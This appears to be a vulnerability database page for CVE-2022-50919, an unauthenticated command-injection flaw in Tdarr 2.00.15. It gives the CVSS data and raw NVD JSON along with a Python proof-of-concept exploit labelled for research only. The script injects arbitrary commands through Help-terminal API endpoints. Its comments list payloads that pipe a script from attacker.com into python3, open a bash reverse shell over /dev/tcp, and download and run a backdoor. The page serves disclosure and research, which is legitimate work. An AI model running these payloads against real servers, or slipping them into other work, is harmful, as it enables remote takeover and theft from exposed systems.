Security Vulnerability Report
CVE-2022-50919 CVSS 9.8 CRITICAL

CVE-2022-50919

Published: 2026-01-13 23:15:56
Last Modified: 2026-01-29 18:54:53

Description

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:* - VULNERABLE
Tdarr 2.00.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2022-50919 - Tdarr Unauthenticated RCE PoC
Target: Tdarr 2.00.15 Help Terminal
Severity: Critical (CVSS 9.8)
Usage: python3 cve-2022-50919.py <target_ip> <target_port>
"""
import requests
import sys
import argparse


def exploit(target_ip, target_port=8265):
    """
    Exploit CVE-2022-50919 by injecting commands through Help terminal
    """
    base_url = f"http://{target_ip}:{target_port}"

    # Prepare malicious payload - chain commands using semicolon
    # This payload executes a reverse shell to attacker controlled server
    cmd = input("Enter command to execute: ")
    payload = f"--help; {cmd}"

    # Alternative payload examples:
    # payload = "--help; curl http://attacker.com/shell.py | python3"
    # payload = "--help; bash -i >& /dev/tcp/attacker_ip/port 0>&1"
    # payload = "--help; wget http://attacker.com/backdoor -O /tmp/back && chmod +x /tmp/back && /tmp/back"

    try:
        # Method 1: Direct API request
        params = {'command': payload}
        response = requests.get(f"{base_url}/api/v1/help", params=params, timeout=10)
        print(f"[*] Request sent to {base_url}/api/v1/help")
        print(f"[*] Payload: {payload}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")

        # Method 2: Alternative endpoint
        headers = {'Content-Type': 'application/json'}
        data = {'cmd': payload}
        response2 = requests.post(f"{base_url}/api/v1/terminal", json=data, headers=headers, timeout=10)
        print(f"[*] Alternative endpoint response: {response2.text[:500]}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

    return True


def main():
    parser = argparse.ArgumentParser(description='CVE-2022-50919 Tdarr RCE Exploit')
    parser.add_argument('target_ip', help='Target Tdarr server IP address')
    parser.add_argument('target_port', type=int, default=8265, help='Target port (default: 8265)')
    args = parser.parse_args()

    print("="*60)
    print("CVE-2022-50919 - Tdarr Unauthenticated RCE")
    print("="*60)

    exploit(args.target_ip, args.target_port)


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50919", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.597", "lastModified": "2026-01-29T18:54:53.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication."}, {"lang": "es", "value": "Tdarr 2.00.15 contiene una vulnerabilidad de ejecución remota de código no autenticada en su terminal de Ayuda que permite a los atacantes inyectar y encadenar comandos arbitrarios. Los atacantes pueden explotar la falta de filtrado de entrada encadenando comandos como '--help; curl .py | python' para ejecutar código remoto sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tdarr:tdarr:2.00.15:*:*:*:*:*:*:*", "matchCriteriaId": "2238BC79-2A44-46AD-B1F9-C1F40FB30357"}]}]}], "references": [{"url": "https://tdarr.io", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50822", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/tdarr-command-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}